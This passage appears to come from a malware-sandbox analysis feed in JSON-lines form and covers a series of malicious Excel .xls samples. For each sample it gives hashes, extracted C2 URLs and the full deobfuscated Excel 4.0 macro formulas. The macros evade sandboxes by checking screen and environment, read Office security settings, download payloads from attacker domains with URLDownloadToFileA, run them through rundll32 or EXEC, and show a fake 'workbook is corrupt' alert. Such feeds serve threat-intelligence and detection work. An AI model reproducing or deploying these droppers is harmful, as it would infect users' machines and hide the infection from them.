,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XeOYmtZMJW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c6cf0ce18e7fb4ddfe25295bd55207c476d376bf87cf75c88bc33601d779d85"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c6cf0ce18e7fb4ddfe25295bd55207c476d376bf87cf75c88bc33601d779d85","filesize":167424,"md5":"1cdb0cc6c41f3ea28449a2cd786e687a","sha1":"d4f3564833ccd73b613a9d0896ec9df3896eca6c","sha256":"4c6cf0ce18e7fb4ddfe25295bd55207c476d376bf87cf75c88bc33601d779d85","sha512":"c40a3829063852aba7e4ba85c8f729e0a40a63640cad162058415ba47c91704a6cccc37e4bb5121ee2304e0aa24818dcb8a996e330e4da0a4b10788c273d7888","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c6cf0ce18e7fb4ddfe25295bd55207c476d376bf87cf75c88bc33601d779d85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"LxBivHFK16\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c752ba1c04154f20e0f5b4e79433d0c1fa3ecaad6eab960e7926daca3c350b0"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c752ba1c04154f20e0f5b4e79433d0c1fa3ecaad6eab960e7926daca3c350b0","filesize":160768,"md5":"0b8017bc99374e8264a8904d31395efd","sha1":"6ccbbc454267a9b6a604d796e906c5c129bd89f1","sha256":"4c752ba1c04154f20e0f5b4e79433d0c1fa3ecaad6eab960e7926daca3c350b0","sha512":"b6ee7e3d8e07d835cb6428bbdabccf9ba57fe5036dc4174b13bd231dbee0eded1bfeb7ee828236727e78ac58f838d0cb9134c3cdd2371faac051c4f4e8f48bb0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c752ba1c04154f20e0f5b4e79433d0c1fa3ecaad6eab960e7926daca3c350b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GgstcxyQNl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c7e7c457619b0bebed36329a00626710274914fbbf1947234e949bc6276e2bf"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c7e7c457619b0bebed36329a00626710274914fbbf1947234e949bc6276e2bf","filesize":160768,"md5":"4838b7f6c10843c4e415a3c90fe1a6aa","sha1":"dc6849cccaee02a3f78235df650aeb1ef8f524bb","sha256":"4c7e7c457619b0bebed36329a00626710274914fbbf1947234e949bc6276e2bf","sha512":"1f466bc00caa8a511427c0cdda7a4adb4b77ad90a7813c6e916e9dc621c97002a03fc82c4d176f07179380c1651cd23f2afcb8d1773564b52e8fbc3fcca53b4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c7e7c457619b0bebed36329a00626710274914fbbf1947234e949bc6276e2bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5dV3ojKoIz\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c84984b1f963a1a8233d213e0ca2dce208cccc5157b0c0932c70278cebab41a"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c84984b1f963a1a8233d213e0ca2dce208cccc5157b0c0932c70278cebab41a","filesize":112128,"md5":"998226d9d17eb217abfeaf369a49d830","sha1":"ee192bf1dd0e0ac1dbfdbcf46c542fa4722742a1","sha256":"4c84984b1f963a1a8233d213e0ca2dce208cccc5157b0c0932c70278cebab41a","sha512":"cd844a8187d6fb49efaf4010e668379f128b8329191767e859535ccc9a0fc073b27fef6ae33b7a1fce01de022984804822e467dd21d111a64460bc8cf386edb7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c84984b1f963a1a8233d213e0ca2dce208cccc5157b0c0932c70278cebab41a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c84fadcc4bc8d0cd681ff4307257e8718c9ace1ffcc9fa511f7562dc194f50b"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c84fadcc4bc8d0cd681ff4307257e8718c9ace1ffcc9fa511f7562dc194f50b","filesize":185344,"md5":"88272bf0d9a5befe90f626ccf418c424","sha1":"e2c85f9a6154db5cae3a12139a39e93527e6b5c8","sha256":"4c84fadcc4bc8d0cd681ff4307257e8718c9ace1ffcc9fa511f7562dc194f50b","sha512":"9bc19444f9bb48b05fab8063ffbdbab9fa8da6c01ee6344a0c1838bec0c4d5821e56a8e65a7d7abf40d705518108b43873052f22a5f9deadcd0707e7590cef89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c84fadcc4bc8d0cd681ff4307257e8718c9ace1ffcc9fa511f7562dc194f50b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c88e99d9635e4bfbc5018059ee33d1813096ba4a57c98d7caa8cc8321d1aa1f"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c88e99d9635e4bfbc5018059ee33d1813096ba4a57c98d7caa8cc8321d1aa1f","filesize":167936,"md5":"6ddc74293555f0b2e644e74faf8cd42e","sha1":"b3ec5a8bd5d3bccf1bb387af1658fc58156449e1","sha256":"4c88e99d9635e4bfbc5018059ee33d1813096ba4a57c98d7caa8cc8321d1aa1f","sha512":"af39adaed905d2c7cf9532d20386a90401a8332bf9308e7c546d9401f4148e01184bd9fb96f0515efc0abd4bd7b5378ff423ea092113f6e250a3c64c395b83c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c88e99d9635e4bfbc5018059ee33d1813096ba4a57c98d7caa8cc8321d1aa1f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XsMcKDeLWm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c9c0a911c6324d11b907f249d50e5bbad050f782fd4556f105743e6a6ee6d08"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c9c0a911c6324d11b907f249d50e5bbad050f782fd4556f105743e6a6ee6d08","filesize":185344,"md5":"d375b4b2c8ac833a59523ffb2532866a","sha1":"1562e680255780ab5faa27d86bd3336c578d9b78","sha256":"4c9c0a911c6324d11b907f249d50e5bbad050f782fd4556f105743e6a6ee6d08","sha512":"295f05c3d17b4c2688cd3d0d1aed90f8b88a54945af6332a058ce77e955e7308c07a079595b10a193ad6c3050285447389ac324dd1299131425454e816396393","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c9c0a911c6324d11b907f249d50e5bbad050f782fd4556f105743e6a6ee6d08.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4cb7a5f7cb39dbd60abbb5e1b11f82a535d8949912e0779643f2f4218bb1e2d7"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4cb7a5f7cb39dbd60abbb5e1b11f82a535d8949912e0779643f2f4218bb1e2d7","filesize":141824,"md5":"49602dbc35397c14a31869dbf3bb9e06","sha1":"da50ddb35bc0b8747756d38e5700429636d411f6","sha256":"4cb7a5f7cb39dbd60abbb5e1b11f82a535d8949912e0779643f2f4218bb1e2d7","sha512":"e7047ebed43a12863246a921b8ea166cddc9d53bc23dd241bb60721de279663a67615cf263a99217a1b30e6818a50cce4194a788fd2cccfaf2bc892e6c3e06f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4cb7a5f7cb39dbd60abbb5e1b11f82a535d8949912e0779643f2f4218bb1e2d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"ZAh9xMHFi0\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4cc8498f6b9c9349bb71c600d4bde7e963b4c8b8a647fc5f28d9e410e5a79f37"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4cc8498f6b9c9349bb71c600d4bde7e963b4c8b8a647fc5f28d9e410e5a79f37","filesize":152576,"md5":"f0a73c7eb534bb0a8e2de6a4692c17fc","sha1":"8994c42a52a771a0ad0363e8199b0e96e228a5ed","sha256":"4cc8498f6b9c9349bb71c600d4bde7e963b4c8b8a647fc5f28d9e410e5a79f37","sha512":"8ae69bf2bca1708df91c53ebb4214473b0f565f5e215bc34275789ef7bdab49bab55196c6ef13703c41982fd0bb4ec8db65454a30283b97e9ac1f5f689ed120d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4cc8498f6b9c9349bb71c600d4bde7e963b4c8b8a647fc5f28d9e410e5a79f37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"08CYVk42tD\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ce11fa0ba01711350e8d1e2604dd9ce34d8619977972387c0b2bac0d35c6c26"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4ce11fa0ba01711350e8d1e2604dd9ce34d8619977972387c0b2bac0d35c6c26","filesize":206336,"md5":"579d0719f2d92dc9b6d801e3e0f619ea","sha1":"10a056fe9d8c5017f14eaceb2df8c56f973b4b90","sha256":"4ce11fa0ba01711350e8d1e2604dd9ce34d8619977972387c0b2bac0d35c6c26","sha512":"0087843c59f63124ca32af4c4d1ccf94de7fd215f54f728c073264f8bb926716db23a23b361f3d1d3a8732a74c13c284b860ceac2a36febcd2e1b2b76eae123c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ce11fa0ba01711350e8d1e2604dd9ce34d8619977972387c0b2bac0d35c6c26.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CpiSflbkMD\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ce38d8c8d6f63898f3e27ad7b69e746f81f909b6ca7fd41444428186a80987b"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4ce38d8c8d6f63898f3e27ad7b69e746f81f909b6ca7fd41444428186a80987b","filesize":206336,"md5":"cbcc4e8cf21ae8c1ab30aa70d3c74589","sha1":"a949b66e41c99bb1dac64260436e814809041f03","sha256":"4ce38d8c8d6f63898f3e27ad7b69e746f81f909b6ca7fd41444428186a80987b","sha512":"1fcefed149a73267fbb21d27f0bd53331d20f4c358126d3dbd5b7590ac304e16353c1d948079925e1339fc7c1bef0b9994de1200376c401d0acb473612f2bd44","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ce38d8c8d6f63898f3e27ad7b69e746f81f909b6ca7fd41444428186a80987b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"abIqxw42Rt\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4cf8b5b196075d67a2c6feb7cc1b297949b33d771efeaa810af9e8ecca88187e"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4cf8b5b196075d67a2c6feb7cc1b297949b33d771efeaa810af9e8ecca88187e","filesize":185344,"md5":"f1456d1f80a182689b3d89b05855b762","sha1":"18cf6eab6c083a8bfd65eb36898345eb78b22c51","sha256":"4cf8b5b196075d67a2c6feb7cc1b297949b33d771efeaa810af9e8ecca88187e","sha512":"37129d465ec3da9ae3a150472d854e02d51584cd7f3714d40183398a544f66599b5dc93049a000ec90860720c0c03e6eec26e19b4bd45e50a2d19e57f65bbf79","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4cf8b5b196075d67a2c6feb7cc1b297949b33d771efeaa810af9e8ecca88187e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d07a1cad674abedd67b700add9334a0f8a7ae658e3359b3c67ac07ce0c90da3"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d07a1cad674abedd67b700add9334a0f8a7ae658e3359b3c67ac07ce0c90da3","filesize":113664,"md5":"1a4654e22375e7fd4e57f738ff8ee5d7","sha1":"ace48a7c7148f9c711eccea2a4628ec744eebba8","sha256":"4d07a1cad674abedd67b700add9334a0f8a7ae658e3359b3c67ac07ce0c90da3","sha512":"ef3ba001b563b04593fb1c95c6ebe9615163229091f61faf7bf6b28ad5968abedf8a2db011d041ed6e069999fbfe7f22429fd69a2bf80bd71c637f48275f73ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d07a1cad674abedd67b700add9334a0f8a7ae658e3359b3c67ac07ce0c90da3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"N4NGfWhrP9\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d2985f9dae80e2692548a7b97902ca7ede8a846f9f7b037a74215799f44cfd0"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d2985f9dae80e2692548a7b97902ca7ede8a846f9f7b037a74215799f44cfd0","filesize":104448,"md5":"79a9012b64cd45c13f396c6ee6bc68cb","sha1":"5fb89a21820ce0771e923e638024f23d5580fa99","sha256":"4d2985f9dae80e2692548a7b97902ca7ede8a846f9f7b037a74215799f44cfd0","sha512":"5789cdfdaeb785b5169a21b27f898f29b7043f90fb79fd0ae72706ed72ac9b232dba0ee1a4c23e5ac898b9c902ffb4ee3927baa73cb9c5f54bc6eb56bd607b88","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d2985f9dae80e2692548a7b97902ca7ede8a846f9f7b037a74215799f44cfd0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"5SJIW9T5RJ\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4d33a1c14773f04f8b68d257cd3c3a56a6650f6d27ea19c5381fb619b94be7d9"},"analysis":{"reported":"2020-04-09T16:16:13Z","score":10},"files":[{"filename":"4d33a1c14773f04f8b68d257cd3c3a56a6650f6d27ea19c5381fb619b94be7d9","filesize":206336,"md5":"9d2fdb0e8424e945a2ee00c9a3fb76ce","sha1":"d29a6ceb6ecc8eb16cb0673278531322ebc81fd0","sha256":"4d33a1c14773f04f8b68d257cd3c3a56a6650f6d27ea19c5381fb619b94be7d9","sha512":"54991419ed4d610c55aeaf9033ab4eb8b2b7ab8ddc94357019ae1899432bdf78f0f458a76c1bc504c9be48bf87fc6e79c02176519f62f516dc2c5d4818f95542","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4d33a1c14773f04f8b68d257cd3c3a56a6650f6d27ea19c5381fb619b94be7d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 